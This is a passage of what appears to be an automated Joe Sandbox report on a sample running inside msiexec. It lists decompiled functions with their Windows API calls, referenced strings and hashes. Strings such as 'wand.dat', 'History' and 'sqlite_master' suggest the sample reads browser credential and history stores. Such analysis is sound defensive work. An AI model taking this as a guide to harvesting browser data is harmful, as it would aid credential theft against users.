                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                              Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _memicmpwcslen
                                                              • String ID: @@@@$History
                                                              • API String ID: 1872909662-685208920
                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                              Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004100FB
                                                              • memset.MSVCRT ref: 00410112
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 00410141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                              • String ID: </%s>
                                                              • API String ID: 3400436232-259020660
                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                              Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D58D
                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                              Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                              Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcsicmpmemset
                                                              • String ID: edit
                                                              • API String ID: 2747424523-2167791130
                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                              Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 3150196962-1506664499
                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                              Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                              Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                              Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                              • String ID:
                                                              • API String ID: 1889144086-0
                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                              Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                              • String ID:
                                                              • API String ID: 1661045500-0
                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                              Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                              Strings
                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                              • API String ID: 1297977491-2063813899
                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                              Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040560C
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 2618321458-1828844352
                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                              Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                              • wcslen.MSVCRT ref: 00410C74
                                                              • _wtoi.MSVCRT(?), ref: 00410C80
                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                              • String ID:
                                                              • API String ID: 1549203181-0
                                                              • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                              • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                              Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00412057
                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                              • String ID:
                                                              • API String ID: 3550944819-0
                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                              Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • free.MSVCRT ref: 0040F561
                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$free
                                                              • String ID: g4@
                                                              • API String ID: 2888793982-2133833424
                                                              • Opcode ID: 1c343f7a35281392d928e4566ae7c5833a23178c5394654a954516dd691eefaa
                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                              • Opcode Fuzzy Hash: 1c343f7a35281392d928e4566ae7c5833a23178c5394654a954516dd691eefaa
                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                              Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                              Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                              • memset.MSVCRT ref: 0040AF18
                                                              • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                              • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                              Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004144E7
                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                              • memset.MSVCRT ref: 0041451A
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                              Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                              • memset.MSVCRT ref: 0042FED3
                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: sqlite_master
                                                              • API String ID: 438689982-3163232059
                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                              Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                              • String ID:
                                                              • API String ID: 3917621476-0
                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                              Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                              • wcscat.MSVCRT ref: 0041101F
                                                              Memory Dump Source
